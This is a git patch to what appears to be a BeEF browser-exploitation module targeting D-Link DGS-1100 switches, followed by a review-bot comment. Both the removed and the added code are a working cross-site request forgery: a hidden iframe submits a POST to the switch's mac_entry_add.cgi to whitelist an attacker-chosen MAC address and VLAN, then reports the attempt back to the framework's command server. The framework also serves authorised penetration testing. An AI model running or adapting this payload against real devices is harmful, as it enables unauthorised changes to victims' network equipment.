From 558646bd8590bc1482d6e84d360e1d1d8d2bb12b Mon Sep 17 00:00:00 2001
From: Nicholas Starke
Date: Sat, 25 Feb 2017 08:03:45 -0600
Subject: [PATCH] Adjusting to use XsrfForm
---
 .../dlink_dgs_1100_fdb_whitelist/command.js | 33 +++----------------
 1 file changed, 5 insertions(+), 28 deletions(-)
diff --git a/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js
index 9398c804f..3cfa1e022 100644
--- a/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js
+++ b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js
@@ -11,34 +11,11 @@ beef.execute(function() {
 var mac = '<%= @mac %>';
 var vlanid = '<%= @vlanid %>';
- var dlink_dgs_iframe = beef.dom.createInvisibleIframe();
-
- var form = document.createElement('form');
- form.setAttribute('action', base + "/cgi/mac_entry_add.cgi");
- form.setAttribute('method', 'POST');
-
- var input = null;
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'fwdport');
- input.setAttribute('value', port);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'vid');
- input.setAttribute('value', vlanid);
- form.appendChild(input);
-
- input = document.createElement('input');
- input.setAttribute('type', 'hidden');
- input.setAttribute('name', 'macaddr');
- input.setAttribute('value', mac);
- form.appendChild(input);
-
- dlink_dgs_iframe.contentWindow.document.body.appendChild(form);
- form.submit();
+ var dlink_dgs_iframe = beef.dom.createIframeXsrfForm(base + '/cgi/mac_entry_add.cgi', 'POST', 'application/x-www-form-urlencoded', [
+ { type: 'hidden', name: 'fwdport', value: port },
+ { type: 'hidden', name: 'vid', value: vlanid },
+ { type: 'hidden', name: 'macaddr', value: mac }
+ ]);
 beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
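Review bot: The new `createIframeXsrfForm` call carries no comment saying what the request does or what it depends on, and the `beef.execute` body starts and ends outside this hunk, so nothing visible explains it. I would add one line above the call, e.g. `// Cross-site form POST to mac_entry_add.cgi; apparently only succeeds while the switch accepts it without an anti-CSRF token or Origin/Referer check`, which also tells anyone triaging the module what the device-side fix is. The explicit `'application/x-www-form-urlencoded'` matches the default enctype of the removed hand-built form, so the request body should be unchanged. `dlink_dgs_iframe` is still assigned but not used inside the hunk; presumably code after the hunk removes the iframe, which is worth confirming now that the value comes from the helper's return.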